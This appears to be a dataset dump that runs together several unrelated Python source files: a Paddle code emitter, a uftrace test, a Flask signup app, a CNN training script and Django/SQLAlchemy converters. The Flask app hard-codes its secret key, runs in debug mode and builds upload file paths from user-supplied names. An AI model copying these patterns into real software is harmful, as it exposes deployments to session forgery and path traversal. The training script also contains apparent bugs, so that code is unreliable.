return self.statement('\n'.join(codes))
def emit_setup_def(self):
return self.statement('def setup(self):')
def get_inputs_info(self, input_nodes):
input_shapes = {}
for n in input_nodes:
name = n.name
output_shape = n.output_shape
shape = [str(s) for s in output_shape[1:]]
input_shapes[name] = ', '.join(shape)
input_shapes = ['"%s": [%s]' % (n, l) for n, l in input_shapes.items()]
shape_str = ','.join(input_shapes)
return '{%s}' % (shape_str)
def emit_main_def(self, name):
if name is None:
return ''
self.prefix = ''
main_def = self.statement('if __name__ == "__main__":')
self.indent()
main_def += self.statement('exit(main())')
return '\n\n' + main_def
def emit_parents(self, chain):
assert len(chain)
s = 'self.feed('
sep = ', \n' + self.prefix + (' ' * len(s))
s += sep.join(
["'%s'" % parent.name for parent in chain[0].node.parents])
return self.statement(s + ')')
def emit_node(self, node):
return self.statement('self.' + node.emit())
def emit(self, name, chains, input_nodes=None):
from ..net_template import generate_net_code
from ..net_template import generate_main_code
self.net_name = name
inputs_info = self.get_inputs_info(input_nodes)
s = self.emit_imports()
s += generate_net_code(name, inputs_info) + '\n'
self.indent()
# define the net using api
s += self.emit_setup_def()
self.indent()
blocks = []
for chain in chains:
b = ''
b += self.emit_parents(chain)
for node in chain:
b += self.emit_node(node)
blocks.append(b[:-1])
s = s + '\n\n'.join(blocks)
# define the main function
s += '\n\n\n' + generate_main_code(name)
s += self.emit_main_def(name)
return s
class Transformer(object):
def __init__(self, def_path, data_path, verbose=True, phase='test'):
self.verbose = verbose
self.phase = phase
self.load(def_path, data_path, phase)
self.params = None
self.source = None
def load(self, def_path, data_path, phase):
# Build the graph
graph = GraphBuilder(def_path, phase).build()
if data_path is not None:
# Load and associate learned parameters
graph = DataInjector(def_path, data_path)(graph)
# Transform the graph
transformers = [
# Fuse split batch normalization layers
BatchNormScaleBiasFuser(),
# Fuse ReLUs
# TODO: Move non-linearity application to layer wrapper, allowing
# any arbitrary operation to be optionally activated.
ReLUFuser(allowed_parent_types=[
NodeKind.Convolution, NodeKind.InnerProduct, NodeKind.BatchNorm
]),
# Rename nodes
# Slashes are used for scoping in Paddle. Replace slashes
# in node names with underscores.
# (Caffe's GoogLeNet implementation uses slashes)
NodeRenamer(lambda node: node.name.replace('/', '_')),
# Fuse Crop
# Crop is to return a scalar output Blob for an input Blob of arbitrary size.
# When one of the input Blob is "input" or "DummyData", we can remove this input Blob
# and put the shape into the reduction layer.
CropFuser()
]
self.graph = graph.transformed(transformers)
#for the purpose of recording name mapping because of fused nodes
trace = SubNodeFuser.traced_names()
chg2real = {}
deleted = {}
for k, v in trace.items():
chg2real[k] = v[-1] #mapping from changed-name to real-name
for n in v:
if n in chg2real:
continue
if n not in deleted:
deleted[n] = '%s.%s' % (k, v[-1])
self.graph.add_name_trace({
'chg2real': chg2real,
'deleted': deleted
}, 'paddle')
# Display the graph
if self.verbose:
print_stderr(self.graph)
def transform_data(self):
if self.params is None:
transformers = [
# Reshape the parameters to Paddle's ordering
DataReshaper({
# (c_o, c_i) -> (c_i, c_o)
NodeKind.InnerProduct: (1, 0)
}),
# Pre-process batch normalization data
BatchNormPreprocessor(),
# Convert parameters to dictionaries
ParameterNamer(),
]
self.graph = self.graph.transformed(transformers)
self.params = {
node.name: node.data
for node in self.graph.nodes if node.data
}
self.params['caffe2fluid_name_trace'] = self.graph.get_name_trace()
return self.params
def transform_source(self):
if self.source is None:
mapper = PaddleMapper(self.graph)
chains = mapper.map()
emitter = PaddleEmitter()
input_nodes = self.graph.get_input_nodes()
self.source = emitter.emit(self.graph.name, chains, input_nodes)
return self.source
| apache-2.0 | -6,877,129,686,947,310,000 | 33.984655 | 97 | 0.570948 | false |
thepaul/uftrace | tests/t222_external_data.py | 1 | 1773 | #!/usr/bin/env python
from runtest import TestBase
import subprocess as sp
TDIR='xxx'
class TestCase(TestBase):
def __init__(self):
TestBase.__init__(self, 'abc', """
# DURATION TID FUNCTION
[28141] | main() {
[28141] | /* external-data: user message */
[28141] | a() {
[28141] | b() {
[28141] | c() {
0.753 us [28141] | getpid();
1.430 us [28141] | } /* c */
1.915 us [28141] | } /* b */
2.405 us [28141] | } /* a */
3.005 us [28141] | } /* main */
""")
def pre(self):
record_cmd = '%s record -d %s %s' % (TestBase.uftrace_cmd, TDIR, 't-abc')
sp.call(record_cmd.split())
replay_cmd = '%s replay -d %s -F main -f time' % (TestBase.uftrace_cmd, TDIR)
p = sp.Popen(replay_cmd.split(), stdout=sp.PIPE)
if p.wait() != 0:
return TestBase.TEST_NONZERO_RETURN
output = p.communicate()[0].decode(errors='ignore')
for l in output.split('\n'):
if l.startswith('#'):
continue;
# parse first line to get the timestamp
t = l.split(' | ')[0].strip()
point = t.find('.')
nsec = int(t[point+1:point+10])
# add the external data right after the first line
msg = '%s.%d %s\n' % (t[:point], nsec + 1, 'user message')
data_file = open(TDIR + '/extern.dat', 'w')
data_file.write(msg)
data_file.close()
break
return TestBase.TEST_SUCCESS
def runcmd(self):
return '%s replay -d %s' % (TestBase.uftrace_cmd.replace(' --no-event',''), TDIR)
def post(self, ret):
sp.call(['rm', '-rf', TDIR])
return ret
| gpl-2.0 | -4,265,747,211,153,739,300 | 30.660714 | 89 | 0.48731 | false |
vwbusguy/beefy-connection | beefyconnection/beefyflask.py | 1 | 2707 | import os,re
from flask import *
from beefy_db import BeefyDatabase
app = Flask(__name__)
def globals():
return { 'title' : 'Beefy Connection!',
'logo' : '/static/images/beefy.png'}
@app.route("/")
def form():
return render_template('mainform.html',**globals())
@app.route("/bc-post",methods=['POST'])
def post():
session['name'] = request.form.get('first-name') + request.form.get('last-name')
#Needs some server side validation
databaseConnector = BeefyDatabase("sqlite:///person.db")
first_name_field = "" if (request.form.get("first-name") == None) else request.form.get("first-name")
last_name_field = "" if (request.form.get("last-name") == None) else request.form.get("last-name")
phone_field = "" if (request.form.get("phone") == None) else request.form.get("phone")
city_field = "" if (request.form.get("city") == None) else request.form.get("city")
state_field = "" if (request.form.get("state") == None) else request.form.get("state")
postal_field = "" if (request.form.get("postal") == None) else request.form.get("postal")
irc_field = "" if (request.form.get("irc") == None) else request.form.get("irc")
email_field = "" if (request.form.get("email") == None) else request.form.get("email")
try:
databaseConnector.add_person(first_name=first_name_field,
last_name=last_name_field,
phone=phone_field,
city=city_field,
state=state_field,
postal_code=postal_field,
irc=irc_field,
fb="",
twitter="",
interests="",
email=email_field,
fas="")
return jsonify(status="Success")
except Exception as e:
return jsonify(**{ "status" : "Error",
"message" : str(e)})
@app.route("/bc-upload",methods=['POST'])
def upload():
try:
name = session['name']
f = re.sub(r'data.*,','',request.form['photo'] +'==').decode('base64')
fn = open("%s/%s/%s" % (os.path.dirname(os.path.realpath(__file__)),"uploads",name + ".png"),'wb')
fn.write(f)
fn.close()
return jsonify(status="Success")
except Exception as e:
return jsonify(**{ "status" : "Error",
"message" : str(e)})
@app.route("/bc-success")
def success():
return render_template('thanks.html',**globals())
if __name__ == "__main__":
app.secret_key = 'beefy-connect'
app.debug = True
app.run()
| gpl-3.0 | 5,017,488,346,320,035,000 | 41.296875 | 106 | 0.533062 | false |
bgshin/vddc | src/train_single.py | 1 | 5219 | #! /usr/bin/env python
import os
import argparse
import tensorflow as tf
import numpy as np
import datetime
# from utils import cnn_data_helpers
from src.utils.butils import Timer
from sklearn.metrics import precision_score, recall_score, f1_score
# from cnn_models.w2v_cnn import W2V_CNN
from src.models.cnn_model import CNN
from src.utils.cnn_input import DataFeeder
from src.utils.word2vecReader import Word2Vec
import time
import gc
import sys
# Parameters
# ==================================================
# Model Hyperparameters
tf.flags.DEFINE_string("filter_sizes", "2,3,4,5", "Comma-separated filter sizes (default: '3,4,5')")
tf.flags.DEFINE_float("dropout_keep_prob", 0.8, "Dropout keep probability (default: 0.5)")
# Training parameters
tf.flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
tf.flags.DEFINE_integer("evaluate_every", 100, "Evaluate model on dev set after this many steps (default: 100)")
# Misc Parameters
tf.flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
tf.flags.DEFINE_boolean("log_device_placement", True, "Log placement of ops on devices")
FLAGS = tf.flags.FLAGS
FLAGS._parse_flags()
print("\nParameters:")
for attr, value in sorted(FLAGS.__flags.items()):
print("{}={}".format(attr.upper(), value))
print("")
def load_w2v(w2vdim, simple_run=True, source="twitter"):
if simple_run:
return {'a': np.array([np.float32(0.0)] * w2vdim)}
else:
if source == "twitter":
model_path = '../data/emory_w2v/w2v-%d.bin' % w2vdim
elif source == "amazon":
model_path = '../data/emory_w2v/w2v-%d-%s.bin' % (w2vdim, source)
model = Word2Vec.load_word2vec_format(model_path, binary=True)
print("The vocabulary size is: " + str(len(model.vocab)))
return model
def run_train(w2vsource, w2vdim, w2vnumfilters, randomseed, l2_reg_lambda):
with Timer('w2v..'):
w2vmodel, vocab_size = load_w2v(w2vdim=FLAGS.embedding_size)
with Timer('loading trn..'):
yelp_trn = DataFeeder(w2vmodel, 'yelp', 'trn', maxlen=FLAGS.sequence_length, batch_size=FLAGS.n_trn,
shuffle=True)
with Timer('loading dev..'):
batch_size = min(FLAGS.n_dev, FLAGS.max_batch)
yelp_dev = DataFeeder(w2vmodel, 'yelp', 'dev', maxlen=FLAGS.sequence_length, batch_size=batch_size,
shuffle=False)
with Timer('loading tst..'):
batch_size = min(FLAGS.n_tst, FLAGS.max_batch)
yelp_tst = DataFeeder(w2vmodel, 'yelp', 'tst', maxlen=FLAGS.sequence_length, batch_size=batch_size,
shuffle=False)
init = tf.global_variables_initializer()
sess = tf.Session(config=tf.ConfigProto(
allow_soft_placement=True,
log_device_placement=FLAGS.log_device_placement))
cnn = CNN(vocab_size + 1)
embedding_init = cnn.w2v.assign(cnn.embedding)
sess.run(init)
# embedding init with pre-trained weights
expanded_w2v = np.concatenate((w2vmodel.syn0, np.zeros((1, 100))), axis=0)
sess.run(embedding_init, feed_dict={cnn.embedding: expanded_w2v})
with tf.Graph().as_default():
max_af1_dev = 0
index_at_max_af1_dev = 0
af1_tst_at_max_af1_dev = 0
# Build an initialization operation to run below.
init = tf.global_variables_initializer()
# Start running operations on the Graph. allow_soft_placement must be set to
# True to build towers on GPU, as some of the ops do not have GPU
# implementations.
# gpu_options = tf.GPUOptions(visible_device_list=str('0,1,2,3'), allow_growth=True) # o
gpu_options = tf.GPUOptions(visible_device_list=str('3'), allow_growth=True) # o
sess = tf.Session(config=tf.ConfigProto(
gpu_options=gpu_options,
allow_soft_placement=True,
log_device_placement=FLAGS.log_device_placement))
sess.run(init)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--w2vsource', default='twitter', choices=['twitter', 'amazon'], type=str)
parser.add_argument('--w2vdim', default=100, type=int)
parser.add_argument('--w2vnumfilters', default=64, type=int)
parser.add_argument('--randomseed', default=1, type=int)
parser.add_argument('--model', default='w2v', choices=['w2v'],
type=str) # w2v, w2vlex, attention
parser.add_argument('--num_epochs', default=25, type=int)
parser.add_argument('--l2_reg_lambda', default=2.0, type=float)
parser.add_argument('--l1_reg_lambda', default=0.0, type=float)
args = parser.parse_args()
program = os.path.basename(sys.argv[0])
print 'ADDITIONAL PARAMETER\n w2vsource: %s\n w2vdim: %d\n w2vnumfilters: %d\n ' \
'randomseed: %d\n num_epochs: %d\n' \
'l2_reg_lambda: %f\n l2_reg_lambda: %f\n' \
% (args.w2vsource, args.w2vdim, args.w2vnumfilters, args.randomseed,args.num_epochs,
args.l2_reg_lambda, args.l1_reg_lambda)
with Timer('trn..'):
run_train(args.w2vsource, args.w2vdim, args.w2vnumfilters, args.randomseed,
args.l2_reg_lambda) | apache-2.0 | -6,664,904,199,226,402,000 | 36.285714 | 112 | 0.643801 | false |
jungx098/BingRewards | test/test_gt.py | 2 | 1613 | #!/usr/bin/python2
import os
import sys
import random
sys.path.append(os.path.join(os.path.dirname(__file__), "..", "pkg/queryGenerators"))
from googleTrends import queryGenerator
if __name__ == '__main__':
G = queryGenerator("nothing")
T = queryGenerator("nothing2")
history = set("nothing")
#print "all queries len:", len(G.allQueries)
#print "unused queries len:", len(G.unusedQueries)
#print "--Running 1st query"
set1 = T.generateQueries(100,history)
print "set size", len(set1)
print "all queries len:", len(G.allQueries)
print "unused queries len:", len(G.unusedQueries)
size = len(set1)
set1 = set(random.sample(set1, len(set1)-5))
print "after random set1 size:", len(set1)
print "using set1 as a history for another search"
print "--Running 2nd query"
queries = G.generateQueries(100,set1)
print "set size", len(queries)
print "all queries len:", len(G.allQueries)
print "unused queries len:", len(G.unusedQueries)
if set1.isdisjoint(queries):
print "No history results are in the final set"
print "--Running 3nd query"
queries2 = G.generateQueries(100,history)
print "set size", len(queries2)
print "all queries len:", len(G.allQueries)
print "unused queries len:", len(G.unusedQueries)
print "Shared entries between query2 and 3:", len(queries.intersection(queries2))
print "--Running 4th query"
queries3 = G.generateQueries(125,history)
print "set size", len(queries3)
print "all queries len:", len(G.allQueries)
print "unused queries len:", len(G.unusedQueries)
| lgpl-3.0 | 3,604,711,186,154,659,300 | 35.659091 | 85 | 0.676379 | false |
bretth/djset | djset/commands.py | 1 | 1634 |
from docopt import docopt
import os
import sys
from .djset import DjSecret, DjConfig
from .utils import _locate_settings
COMMAND = """
Usage: dj%(cmd)s add <key>=<value> [--global] [--name=<name> | --settings=<settings>]
dj%(cmd)s remove <key> [--global] [--name=<name> | --settings=<settings>]
"""
def _create_djset(args, cls):
""" Return a DjSecret object """
name = args.get('--name')
settings = args.get('--settings')
if name:
return cls(name=name)
elif settings:
return cls(name=settings)
else:
return cls()
def _parse_args(args, cls):
""" Parse a docopt dictionary of arguments """
d = _create_djset(args, cls)
key_value_pair = args.get('<key>=<value>')
key = args.get('<key>')
func = None
if args.get('add') and key_value_pair:
fargs = tuple(args.get('<key>=<value>').split('='))
if fargs[1]:
func = d.set
elif args.get('remove') and key:
func = d.remove
fargs = (args.get('<key>'),)
kwargs = {'glob': args.get('--global')}
if func:
return func, fargs, kwargs
else:
return None, None, None
def main(command, cls):
sys.path.append(os.getcwd())
args = docopt(command)
func, fargs, kwargs = _parse_args(args, cls)
if func:
func(*fargs, **kwargs)
s = _locate_settings(args.get('--settings'))
os.utime(s, None)
def djsecret():
command = COMMAND % {'cmd': 'secret'}
main(command, DjSecret)
def djconfig():
command = COMMAND % {'cmd': 'config'}
main(command, DjConfig)
| mit | -980,778,445,093,819,100 | 22.681159 | 86 | 0.563035 | false |
dvhbru/dvhb-hybrid | dvhb_hybrid/amodels/convert.py | 1 | 6278 | import logging
import sqlalchemy as sa
import sqlalchemy.types as sa_types
from django.db.models import ForeignKey, ManyToManyField, ManyToManyRel, OneToOneField
from sqlalchemy.dialects.postgresql import ARRAY as SA_ARRAY, JSONB as SA_JSONB, UUID as SA_UUID
from .model import Model
from .relations import ManyToManyRelationship
from ..utils import convert_class_name
logger = logging.getLogger(__name__)
def Geometry(*args, **kwargs):
return sa_types.NullType()
class FieldConverter:
"""
Converts Django field to SQLAlchemy column clause
.. code-block::python
converter = FieldConverter()
sa_column = converter.convert(field)
"""
def __init__(self):
self._types = {
# Django internal type => SQLAlchemy type
'ArrayField': SA_ARRAY,
'AutoField': sa_types.Integer,
'BigAutoField': sa_types.BigInteger,
'BigIntegerField': sa_types.BigInteger,
'BooleanField': sa_types.Boolean,
'CharField': sa_types.String,
'DateField': sa_types.Date,
'DateTimeField': sa_types.DateTime,
'DecimalField': sa_types.Numeric,
'DurationField': sa_types.Interval,
'FileField': sa_types.String,
'FilePathField': sa_types.String,
'FloatField': sa_types.Float,
'GenericIPAddressField': sa_types.String,
'IntegerField': sa_types.Integer,
'JSONField': SA_JSONB,
'NullBooleanField': sa_types.Boolean,
'PointField': Geometry,
'PositiveIntegerField': sa_types.Integer,
'PositiveSmallIntegerField': sa_types.SmallInteger,
'SlugField': sa_types.String,
'SmallIntegerField': sa_types.SmallInteger,
'TextField': sa_types.Text,
'TimeField': sa_types.Time,
'UUIDField': SA_UUID,
# TODO: Add missing GIS fields
}
def _convert_type(self, dj_field, sa_type):
kwargs = {}
if sa_type is SA_ARRAY:
internal_type = dj_field.base_field.get_internal_type()
kwargs['item_type'] = self._types.get(internal_type)
if kwargs['item_type'] is None:
raise ConversionError(
'Unable convert array: '
'item type "%s" not found' % internal_type
)
elif sa_type is Geometry:
kwargs['geometry_type'] = 'POINT'
kwargs['srid'] = dj_field.srid
elif sa_type is sa_types.Numeric:
kwargs['scale'] = dj_field.decimal_places,
kwargs['precision'] = dj_field.max_digits
elif sa_type in (sa_types.String, sa_types.Text):
kwargs['length'] = dj_field.max_length
elif sa_type is SA_UUID:
kwargs['as_uuid'] = True
return sa_type(**kwargs)
def convert(self, dj_field):
result = []
if isinstance(dj_field, (ForeignKey, OneToOneField)):
result.append(dj_field.column)
convert_from = dj_field.target_field
else:
result.append(dj_field.name)
convert_from = dj_field
internal_type = convert_from.get_internal_type()
convert_to = self._types.get(internal_type)
if convert_to is not None:
result.append(self._convert_type(convert_from, convert_to))
else:
logger.info(
'Not found corresponding '
'SQLAlchemy type for "%s"(%r)',
internal_type,
dj_field
)
return sa.column(*result)
FIELD_CONVERTER = FieldConverter()
def convert_m2m(field):
if isinstance(field, ManyToManyField):
dj_model = field.remote_field.through
source_field = field.m2m_column_name()
target_field = field.m2m_reverse_name()
elif isinstance(field, ManyToManyRel):
dj_model = field.through
source_field = field.remote_field.m2m_reverse_name()
target_field = field.remote_field.m2m_column_name()
else:
raise ConversionError('Unknown many to many field: %r' % field)
def m2m_factory(app):
model_name = convert_class_name(dj_model.__name__)
if hasattr(app.m, model_name):
# Get existing relationship model
model = getattr(app.m, model_name)
else:
# Create new relationship model
model = type(dj_model.__name__, (Model,), {})
model.table = model.get_table_from_django(dj_model)
model = model.factory(app)
# Note that async model's name should equal to corresponding django model's name
target_model_name = convert_class_name(field.related_model.__name__)
target_model = getattr(app.m, target_model_name)
return ManyToManyRelationship(app, model, target_model, source_field, target_field)
return m2m_factory
def convert_model(model, **field_types):
"""
Converts Django model to SQLAlchemy table
"""
options = model._meta
fields = []
rels = {}
for f in options.get_fields():
i = f.name
if i in field_types:
fields.append(sa.column(i, field_types[i]))
elif f.is_relation:
if f.many_to_many:
rels[i] = convert_m2m(f)
elif f.many_to_one:
# TODO: Add ManyToOneRelationship to rels
fields.append(FIELD_CONVERTER.convert(f))
elif f.one_to_many:
pass # TODO: Add OneToManyRelationship to rels
elif f.one_to_one:
# TODO: Add OneToOneRelationship to rels
if not f.auto_created:
fields.append(FIELD_CONVERTER.convert(f))
else:
raise ConversionError('Unknown relation: {}'.format(i))
else:
fields.append(FIELD_CONVERTER.convert(f))
return sa.table(options.db_table, *fields), rels
def derive_from_django(dj_model, **field_types):
def wrapper(amodel):
table, rels = convert_model(dj_model, **field_types)
amodel.table = table
amodel.relationships = rels
return amodel
return wrapper
class ConversionError(Exception):
pass
| mit | 5,080,585,300,669,108,000 | 34.072626 | 96 | 0.587608 | false |
Subsets and Splits